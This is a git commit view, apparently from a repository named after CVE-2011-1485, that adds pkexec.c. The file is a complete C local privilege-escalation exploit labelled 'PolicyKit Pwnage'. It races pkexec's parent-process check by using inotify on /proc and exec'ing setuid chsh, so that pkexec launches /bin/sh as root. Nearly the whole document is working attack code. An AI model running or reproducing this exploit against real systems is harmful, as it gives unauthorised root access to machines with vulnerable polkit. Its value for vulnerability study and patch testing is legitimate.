diff options
| author |   Jason A. Donenfeld <Jason@zx2c4.com> | 2011-09-02 18:43:38 -0400 |
|---|---|---|
| committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-09-02 18:43:38 -0400 |
| commit | 54e40e7eb824827dfc09670230b350b4bf723aa8 (patch) | |
| tree | 7ec23d2d4f421796d7e5d0cee7562b4bcaf6bc65 | |
| download | CVE-2011-1485-54e40e7eb824827dfc09670230b350b4bf723aa8.tar.xz CVE-2011-1485-54e40e7eb824827dfc09670230b350b4bf723aa8.zip | |
Initial import.
| -rw-r--r-- | pkexec.c | 37 |
1 files changed, 37 insertions, 0 deletions
diff --git a/pkexec.c b/pkexec.c new file mode 100644 index 0000000..b0c1f0e --- /dev/null +++ b/pkexec.c @@ -0,0 +1,37 @@ + +#include <stdio.h> +#include <stdlib.h> +#include <errno.h> +#include <unistd.h> +#include <sys/types.h> +#include <sys/inotify.h> + +int main(int argc, char **argv) +{ + printf("=============================\n"); + printf("= PolicyKit Pwnage =\n"); + printf("= by zx2c4 =\n"); + printf("= Sept 2, 2011 =\n"); + printf("=============================\n\n"); + + if (fork()) { + int fd; + char pid_path[1024]; + sprintf(pid_path, "/proc/%i", getpid()); + printf("[+] Configuring inotify for proper pid.\n"); + + close(0); close(1); close(2); + fd = inotify_init(); + if (fd < 0) + perror("[-] inotify_init"); + inotify_add_watch(fd, pid_path, IN_ACCESS); + read(fd, NULL, 0); + execl("/usr/bin/chsh", "chsh", NULL); + } else { + sleep(1); + printf("[+] Launching pkexec.\n"); + execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL); + } + + return 0; +} |